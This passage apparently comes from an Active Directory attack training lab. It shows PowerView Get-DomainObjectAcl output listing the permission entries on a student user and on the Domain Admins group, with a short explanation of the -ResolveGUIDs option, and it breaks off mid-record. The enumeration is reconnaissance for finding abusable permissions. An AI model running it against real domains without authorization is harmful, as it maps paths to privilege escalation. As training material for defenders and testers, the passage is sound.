IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Logon
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Logon
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Membership
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Membership
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : General-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : General-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : RAS-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : RAS-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : ms-DS-Key-Credential-Link
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-335606122-960912869-3279953914-527
AccessMask : 48
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName :

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : ms-DS-Key-Credential-Link
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-526
AccessMask : 48
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName :

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : Self
ObjectAceType : DS-Validated-Write-Computer
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-3-0
AccessMask : 8
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Computer
OpaqueLength : 0
IdentityName : Creator Owner

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : Self
ObjectAceType : DS-Validated-Write-Computer
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-10
AccessMask : 8
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Computer
OpaqueLength : 0
IdentityName : Principal Self

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Token-Groups
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-9
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Computer
OpaqueLength : 0
IdentityName : Enterprise Domain Controllers

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Token-Groups
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-9
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Group
OpaqueLength : 0
IdentityName : Enterprise Domain Controllers

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Token-Groups
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-9
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0
IdentityName : Enterprise Domain Controllers

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : WriteProperty
ObjectAceType : ms-TPM-Tpm-Information-For-Computer
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-10
AccessMask : 32
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Computer
OpaqueLength : 0
IdentityName : Principal Self

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
ObjectAceType : All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 131220
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
ObjectAceType : All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 131220
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Group
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
ObjectAceType : All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 131220
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit, ObjectInherit
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 48
AuditFlags : None
IsInherited : True
AceFlags : ObjectInherit, ContainerInherit, Inherited
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Principal Self

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty, ExtendedRight
ObjectAceType : Private-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 304
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Principal Self

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 36
IsInherited : True
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-335606122-960912869-3279953914-519
AccessMask : 983551
AuditFlags : None
AceFlags : ContainerInherit, Inherited
AceQualifier : AccessAllowed
IdentityName :

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ListChildren
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 24
IsInherited : True
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 4
AuditFlags : None
AceFlags : ContainerInherit, Inherited
AceQualifier : AccessAllowed
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 24
IsInherited : True
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-544
AccessMask : 983485
AuditFlags : None
AceFlags : ContainerInherit, Inherited
AceQualifier : AccessAllowed
IdentityName : BUILTIN\Administrators

Getting the ACLs of a specified LDAP path (SearchBase)

With -SearchBase pointing at a single object (here the Domain Admins group), only that object's own DACL is returned, and -ResolveGUIDs turns the ObjectAceType / InheritedObjectAceType GUIDs into schema and extended-right names. The verbose output shows what that resolution costs: a krbtgt lookup in the forest root plus full reads of the Schema and Extended-Rights containers to build the GUID map, so the first run against a DC is noticeably chattier than a plain query. The two "Error disposing of the Results object" lines are emitted by PowerView's Get-DomainGUIDMap and do not affect the results, which follow immediately after them.


PS C:\Users\student163> Get-DomainObjectAcl -SearchBase "LDAP://CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainUser] filter string: (&(samAccountType=805306368)(|(samAccountName=krbtgt))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string: (&(samAccountType=805306368)(|(samAccountName=krbtgt)))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/CN=Schema,CN=Configuration,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string: (schemaIDGUID=*)
VERBOSE: [Get-DomainGUIDMap] Error disposing of the Results object: Method invocation failed because [System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainSearcher] search base: LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/CN=Extended-Rights,CN=Configuration,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string: (objectClass=controlAccessRight)
VERBOSE: [Get-DomainGUIDMap] Error disposing of the Results object: Method invocation failed because [System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObjectAcl] Get-DomainObjectAcl filter string:
VERBOSE: [Get-DomainSearcher] search base: LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string: (objectClass=*)

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Account-Restrictions
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Account-Restrictions
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Logon
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Logon
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Membership
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Membership
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : General-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : General-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : RAS-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : RAS-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : X509-Cert
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-517
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Token-Groups-Global-And-Universal
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-560
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Terminal-Server
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-561
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Terminal-Server-License-Server
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-561
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
ObjectAceType : All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 131220
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
ObjectAceType : All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 131220
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : User-Change-Password
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-1-0
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : User-Change-Password
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty, ExtendedRight
ObjectAceType : Private-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : ContainerInherit
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 304
AuditFlags : None
IsInherited : False
AceFlags : ContainerInherit
InheritedObjectAceType : All
OpaqueLength : 0

AceType : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : CreateChild, DeleteChild, Self, WriteProperty, ExtendedRight, GenericRead, WriteDacl, WriteOwner
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
